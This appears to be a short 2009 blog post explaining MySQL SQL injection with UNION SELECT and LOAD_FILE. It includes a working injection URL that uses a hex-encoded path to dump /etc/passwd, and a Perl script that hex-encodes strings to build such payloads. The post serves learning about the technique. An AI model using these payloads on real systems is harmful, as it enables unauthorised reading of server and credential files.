MYSQL LOAD_FILE SQL Injection

Posted by Tully on Thu 30 July 2009

So today I was reading up on SQL injection techniques, and came across one that I hadn't seen before. I found out that it is possible to use a UNION SELECT with the built-in MYSQL LOAD_FILE function, to read the contents of any file on the system. This only works if the user has been granted permission to use the LOAD_FILE function, and of course the MYSQL DAEMON must have permission to read the file. I also found out that the LOAD_FILE function can read HEX decimal characters.

Example SQL Injection

www.example.com/article.php?id=1+union+select+LOAD_FILE(0x2f6574632f706173737764)

This will return the contents of the /etc/passwd file on a Linux server.

I also came across a handy perl script today that will encode a given string into HEX.

Perl HEX converter:

print "Enter string to encode:";$str=<STDIN>;chomp $str;

$enc = encode($str); print "Hex Encoded value: 0x$enc\n";

sub encode{
    #Sub to encode  
    @subvar=@_;  
    my $sqlstr = $subvar[0];

    @ASCII = unpack("C*", $sqlstr);  
    foreach $line (@ASCII) {
        $encoded = sprintf('%lx',$line);  
        $encoded_command .= $encoded;
    }  
    return $encoded_command;
}